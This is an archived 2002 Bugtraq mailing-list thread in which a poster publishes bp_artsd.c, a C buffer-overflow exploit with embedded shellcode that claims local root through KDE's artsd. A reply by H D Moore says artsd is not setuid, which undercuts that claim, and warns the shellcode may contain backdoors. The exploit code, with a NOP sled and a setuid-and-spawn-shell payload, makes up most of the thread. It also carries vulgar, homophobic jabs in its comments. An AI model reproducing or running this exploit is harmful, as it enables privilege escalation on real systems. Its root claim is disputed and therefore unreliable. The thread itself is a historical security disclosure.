8786472 2002-07-29 19:55 +0200  /10 rader/ kokane <kokane@segfault.ch>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-29  21:11  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Extern mottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <23328>
Ärende: KDE 2/3 artsd 1.0.0 local root exploit
------------------------------------------------------------
From: "kokane" <kokane@segfault.ch>
To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>,
 <submissions@packetstormsecurity.org>
Message-ID: <000a01c23729$1a744710$56dde6c2@cuntNIX>

KDE 2/3 artsd 1.0.0 local root exploit PoC.

Cheers,
-kokane
(8786472) /kokane <kokane@segfault.ch>/-------------
Bilaga (application/octet-stream) i text 8786473
Kommentar i text 8787187 av H D Moore <hdm@digitaloffense.net>
8786473 2002-07-29 19:55 +0200  /64 rader/ kokane <kokane@segfault.ch>
Bilagans filnamn: "bp_artsd.c"
Importerad: 2002-07-29  21:11  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Extern mottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <23329>
Bilaga (text/plain) till text 8786472
Ärende: Bilaga (bp_artsd.c) till: KDE 2/3 artsd 1.0.0 local root exploit
------------------------------------------------------------
/* bp_artsd.c
 * KDE 2/3 artsd 1.0.0 local root exploit
 *
 * credits: dvorak (helped me A LOT!@#), electronicsouls.org
 *
 * greets:
 * bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man, 
 * philer, preamble, eth1cal
 * fucks to: fd0 (du schwule schlumpf)
 *
 * -kokane <kokane@segfault.ch>
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define BSIZE	1033
#define ESIZE   5120
#define RET	0xbffff808	/* tested on suse linux 8.0  */

unsigned char buttcode[] =
	"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0);
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
	"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void anal(char *rets, char *evil) {
  char * arg_[] = { "artsd", "-m", rets, 0 };
  char * env_[] = { evil, 0 };
  execve("/opt/kde3/bin/artsd", arg_, env_);
}

int main(int argc, char **argv) {
  char buf[BSIZE], egg[ESIZE];
  unsigned long retaddr=RET;
  int i;

  fprintf(stdout, "\n+ KDE 2/3 artsd 1.0.0 local root exploit
(bp_artsd.c)\n+ by kokane/buttP!RATEZ\n");

  if (argc >  1)
	retaddr = strtoul(argv[1], NULL, 0);
  fprintf(stdout, "\n+ ret_addr: 0x%x\n\n", retaddr);

  /* fill our buffer with ret_addr's */
  for (i = BSIZE-1 ; i >= 4 ; i = i-4)
	*(unsigned long *)&buf[i - 4] = retaddr;

  /* fill our evil environment variable with nops + shellcode */
  memset(egg, 0x90, sizeof(egg));
  for (i = 0; i <= strlen(buttcode) ;i++)
	egg[ESIZE - 1 - i] = buttcode[strlen(buttcode) - i];
  memcpy(egg,"UNF=",4);

  buf[BSIZE - 1] = '\0';
  egg[ESIZE - 1] = '\0';

  anal(buf, egg);
  return 0;
}
/* buttP!RATEZ - providing k-rad anal sex since 2001 */
(8786473) /kokane <kokane@segfault.ch>/---(Ombruten)
8787187 2002-07-29 13:43 -0500  /52 rader/ H D Moore <hdm@digitaloffense.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-30  00:15  av Brevbäraren
Extern mottagare: kokane <kokane@segfault.ch>
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Extern mottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <23335>
Kommentar till text 8786472 av kokane <kokane@segfault.ch>
Ärende: Re: [VulnWatch] KDE 2/3 artsd 1.0.0 local root exploit
------------------------------------------------------------
From: H D Moore <hdm@digitaloffense.net>
To: "kokane" <kokane@segfault.ch>, <bugtraq@securityfocus.com>,
 <vulnwatch@vulnwatch.org>, <submissions@packetstormsecurity.org>
Message-ID: <200207291343.31929.hdm@digitaloffense.net>

The artsd binary is not setuid, its supposed to be called by the
setuid  artswrapper application (which sets a higher scheduling
priority,  setuid(getuid())'s and executes the real artsd binary. I
haven't bothered  to look through the shellcode for backdoors yet...

---

hdm@masada:/tools> head -n 20 bp_artsd.c && ls -la
/opt/kde3/bin/artsd &&  cat /etc/SuSE-release

/* bp_artsd.c
 * KDE 2/3 artsd 1.0.0 local root exploit
 *
 * credits: dvorak (helped me A LOT!@#), electronicsouls.org
 *
 * greets:
 * bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man,
 * philer, preamble, eth1cal
 * fucks to: fd0 (du schwule schlumpf)
 *
 * -kokane <kokane@segfault.ch>
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define BSIZE   1033
#define ESIZE   5120
#define RET     0xbffff808      /* tested on suse linux 8.0  */

-rwxr-xr-x    1 root     root       126696 May 14 19:30 
/opt/kde3/bin/artsd

SuSE Linux 8.0 (i386)
VERSION = 8.0




On Monday 29 July 2002 12:55, kokane wrote:
> KDE 2/3 artsd 1.0.0 local root exploit PoC.
>
> Cheers,
> -kokane
(8787187) /H D Moore <hdm@digitaloffense.net>/(Ombruten)